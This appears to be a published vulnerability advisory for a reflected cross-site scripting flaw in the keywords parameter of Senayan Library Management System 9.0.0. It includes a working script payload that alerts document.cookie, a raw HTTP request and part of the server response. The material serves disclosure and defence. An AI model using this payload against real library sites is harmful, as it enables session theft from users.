Senayan Library Management System 9.0.0 Cross Site Scripting

Senayan Library Management System version 9.0.0 suffers from a cross site scripting vulnerability.

SHA-256 | ac897cc657f6fa46fa4932c82d8baab7fcd4d9af7c0755a81ff66e8fa8ae599c

## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9
Multiple XSS-Reflected vulnerabilities
## Author: nu11secur1ty
## Date: 12.09.2022
## Vendor:
## Software:
## Reference:

## Description:
The value of the keywords request parameter is copied into the value
of an HTML tag attribute which is encapsulated in double quotation
The payload m8vzl"><script>alert(hello_vulnerability)</script>hidhc
was submitted in the keywords parameter.
This input was echoed unmodified in the application's response.

## STATUS: HIGH Vulnerability

[+] Payload:

GET /slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhc
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Connection: close
Cache-Control: max-age=0
Cookie: SenayanMember=aoujjbpmorr1km0t1j9g5cnhju
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0

[+] Response:

HTTP/1.1 200 OK
Date: Fri, 09 Dec 2022 06:23:20 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29492

# ===============================
# Classic SLiMS Template
# ===============================
# @Author: Waris Agung Widodo
# @Email: [email protected]
# @Date: 2018-01-23T11:25:57+07:00
# @Last modified by: Waris Agung Widodo
# @Last modified time: 2019-01-03T11:25:57+07:00
<!DOCTYPE html>
<meta charset="utf-8">
<title>Open Source Library Management System | Senayan</title>
<meta name="viewport" content="width=device-width,
initial-scale=1, shrink-to-fit=no">

<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv="Pragma" content="no-cache"/>
<meta http-equiv="Cache-Control" content="no-store, no-cache,
must-revalidate, post-check=0, pre-check=0"/>
<meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>

<meta name="description" content="Open Source Library
Management System | Senayan">
<meta name="keywords" content="Open Source Library Management System">
<meta name="viewport" content="width=device-width,
height=device-height, initial-scale=1">
<meta name="generator" content="SLiMS 9 (Bulian)">
<meta name="theme-color" content="#000">

<meta property="og:locale" content="en_US"/>
<meta property="og:type" content="book"/>
<meta property="og:title" content="Open Source Library Management
System | Senayan"/>
<meta property="og:description" content="Open Source Library
Management System"/>
<meta property="og:url"
## Reproduce:

## Proof and Exploit:

## Time spent

Related Posts